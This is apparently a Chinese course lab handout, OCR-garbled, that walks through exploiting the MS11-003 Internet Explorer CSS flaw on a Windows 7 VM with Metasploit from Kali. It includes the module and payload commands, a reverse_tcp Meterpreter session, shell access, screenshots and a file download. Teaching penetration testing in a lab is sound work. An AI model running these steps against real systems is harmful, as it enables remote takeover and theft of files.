工业互联网安全测试技术：系统测试.docx

《工业互联网安全测试技术：系统测试.docx》由会员分享，可在线阅读，更多相关《工业互联网安全测试技术：系统测试.docx（6页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、系统2系统测试实验文档实验原理msll-003漏洞(Windows7IE溢出攻击)是利用IE浏览器中对css的解析存在一个问题, 导致任何访问包含非法css的页面将导致IE浏览器崩溃重启的漏，利用这个漏洞可以获取 Windows7计算机的控制台。实验目的通过kali linux里面集成的Metasploit渗透测试框架,利用msll-003漏洞，从而实现 对被入侵主机实施文件下载、控制命令窗口等攻击。实验环境Windows 7 系统Kali Linux 系统,推荐课时数：2课时实验步骤 首先翻开 kali 虚拟机和一台 windows? ie8,在 windows7查看 IP ： 192,16

2、8.233,138, kali 查看 IP ： C：Usersyanipconf igWindows IP 配置以太网适配器本地连接:珏道适配器 isatap. localdomainDNS后缀localdonain fe80：b80e：媒体已断开 localdonainAle Actions Edit View Help f(kalikali)-(-J J ifconfigethO： flagS-4163 mtu 1500 inet 192.168.233.130 netaask 255.255.255.0 broadcast 192.168.233.255 inet6 fe80 :20c:

3、29f f:fe42：4d6 prefixlen 64 scopeid 0x2O ether 00：0c:29：42：04:d6 txqueuelen 1000 (Ethernet) RX packets 174 bytes 19377 (18.9 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 23 bytes 2346 (2.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 010： HagS-73 mtu 65536 inet 127.0.0.1 ne

4、tmask 255.0.0.0 inet6 :1 prefixlen 128 scopeid 0lO loop txqueuelen 1000 (Local Loopback) RX packets 8 bytes 400 (400.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8 bytes 400 (400.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0图1 IP地址(2)在kali虚拟机中ping该虚拟机,查看是否可以ping通。L$ ping P

5、ING 192.168.233.149 (192.168.233.149) 56(84) bytes of data.64bytesfrom：icmp_seq=lttl=128time=0.926ms64bytesfrom：icmp_seq=2ttl=128time=0.420ms64bytesfrom：icmp_seq=3ttl=128time=0.871ms64bytesfrom：icmp_seq=4ttl=128time=0.353ms64bytesfrom：icmp_seq=5ttl=128time=0.369ms图 2 kali ping win7(3) Metasploit框架(简

6、称MSF)是一个开源工具，旨在方便渗透测试，它是由Ruby程序 语言编写的模板化框架，具有很好的扩展性，便于渗透测试人员开发，使用定制的工具模 板。该工具有六个模块，分别为辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模 块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为 总模块，其他均为分支模块。翻开msfconsole工具，命令行中输入search msll_003omsf6 search msll_003Matching Modules# Name iption# Name iptionDi

7、sclosure Date Rank Check Descr0 exploit/windows/browser/msll_003_ie_css_import 2010-11-29 good No MS11- 003 Microsoft Internet Explorer CSS Recursive Import Use After FreeInteract with a module by name or index. For example info 0, use 0 or use exploit/windows /browser/msll 003 ie css import图3查看msll

8、_003漏洞(4) 使用命令 use exploit/windows/browser/msll_003Je_css_importmsf6 use exploit/windows/browser/msll_003_ie_css_importNo payload configured, defaulting to windows/meterpreter/reverse_tcp图4使用msll_003漏洞(5) show payloads 选择 windows/meterpreter/reverse_tcpmsf6 exploit() show payloadsCompatible Payloads

9、# NameDisclosure Date RankCheck Description0payload/generic/customnormal NoCustom Payload1 payload/generic/debug_trapnormal NoGeneric x86 Debug Trap2 payload/generic/shell_bind_tcpnormal No Generic Command Shell, Bind TCP Inline3 payload/generic/shell_reverse_tcpnormal No Generic Command Shell, Reve

10、rse TCP Inline4 payload/generic/tight_loopnormal No Generic x86 Tight Loop5 payload/windows/dllinject/bind_hidden_ipknock_tcpnormal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager6 payload/windows/dllinject/bind_hidden_tcpnormal No Reflective DLL Injection, Hidden Bind TCP Stager7 payloa

11、d/windows/dllinject/bind_ipv6_tcpnormal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)8 payload/windows/dllinject/bind_ipv6_tcp_uuidnorm al No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)图5查看payloads(6)输入如下的命令 set payloads windows/meterpreter/revers

12、e_tcpmsf6 exploit() set payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/reverse_tcp msf6 exploit() (7)msf6 exploit( srvhost n 192.168.233.130 msf6 exploit(msf6 exploit(8) show options查看配置情况msf6 exploit() show optionsModule options (exploit/windows/browser/msll_003_ie_css_import

13、)：NameCurrent SettingRequiredDescriptionOBFUSCATEtruenoEnable JavaScript obfuscationSRVHOSTyesThe local host or network interface to listen on. This must be an address on the local machi ne or 0.0.0.0 to listen on all addresses.SRVPORT8080yesThe local port to listen on.SSLfalsenoNegotiate SSL for in

14、coming connectionsSSLCertnoPath to a custom SSL certificate (default is r andomly generated)URIPATHnoThe URI to use for this exploit (default is ra ndom)Payload options (windows/meterpreter/reverse.tcp)：NameCurrent SettingRequiredDescriptionEXITFUNCprocessyesExit technique (Accepted:seh, thread, pro

15、cess, none)LHOSTyesThe listen address (an interface may be specifi ed)LPORT4444yesThe listen portExploit target:Id Name0 Automatic图8查看配置情况(9) 设置 uripathset uripath +任意输入(例如00)msf6 exploit() set uripath 00uripath = 00msf6 exploit() ，图9(10)开始运行run/exploit,会出现一个URL将其复制下来，粘贴到windows7的ie浏览器 中msf6 exploit

16、() Started reverse TCP handler on 192.168.233.130:4444L* Using URL： ：8080/00* Server started.图 10 URL(11)出现如下情况，那么连接成功Session has User level rights.* Will attempt to migrate to a User level process.Could not migrate to explorer.exe.- Attempting to spawn explorer.exe+ Successfully spawned explorer.ex

17、e* Trying explorer.exe (4516)* 192.168.233.138 msll_003_ie_css_import - Received request for /00/generic-163885114 0.dll* 192.168.233.138 msll_003_ie_css_import - Sending .NET DLL* + Successfully migrated to explorer.exe (4516) as: WIN-2CSC42S4EQLyan* Meterpreter session 1 opened (192.168.233.130:44

18、44 T 192.168.233.138:51173) at 2021- AU c 本ccc图11sessions查看会话sessionsActive sessionsId Name TypeInformationConnection1meterpreter x86/windows WIN-2CSC42S4EQLyan a) WI 192.168.233.130:4444 TN-2CSC42S4EQL192.168.233.138：51173 ( 1)2meterpreter x86/windows WIN-2CSC42S4EQLyan a) WI 192.168.233.130:4444 T

19、N-2CSC42S4EQL192.168.233.138：51175 (1)图12(12) sessions +ID (例如 sessions 1) o选择sessions会话的时候可能会连接不成功，那么换一个sessions即可。连接成功后，使用shell命令可以进入win7计算机的控制台。msf6 exploit() sessions 1* Starting interaction with 1 . meterpreter shell Process 4092 created. Channel 1 created.Microsoft Windows 幽 6.1.7600(c) 2009 M

20、icrosoftC：UsersyanDesktop|图13进入控制台后输入calc可以翻开计算器，输入2.txt可以翻开该文件夹下的2,txtoC:UsersyanDesktopcalc calc翻开 calc.exeC：UsersyanDesktop2.txt 2.txt翻开2.txt(14)输入 exit,会进入 meterpreter,输入 screenshot 会截取 win7 屏幕；download c:/2.txt 会下载c盘的文件2.txtJBXgZww.jpeg 800x600 32.3 kB 69.4% meterpreter screenshotScreenshot sav

21、ed to: /home/kali/JBXgZvvw.jpeg meterpreter 截屏2.txt.xsession- errors.old.XauthorityDevices File SystemNetworkD Browse Network16 folders, 27 files: 547.8 KiB (560,971 bytes), Free space: 63.1 GiBmeteroreter download C：/2.txt* Downloading: C：/2.txt - /home/kali/2.txt* Downloaded 142.00 B of 142.00 B (100.0%)： C：/2.txt - /home/kali/2.txtI* download : C：/2.txt t /home/kali/2.txtmeterpreter |下载win7的文件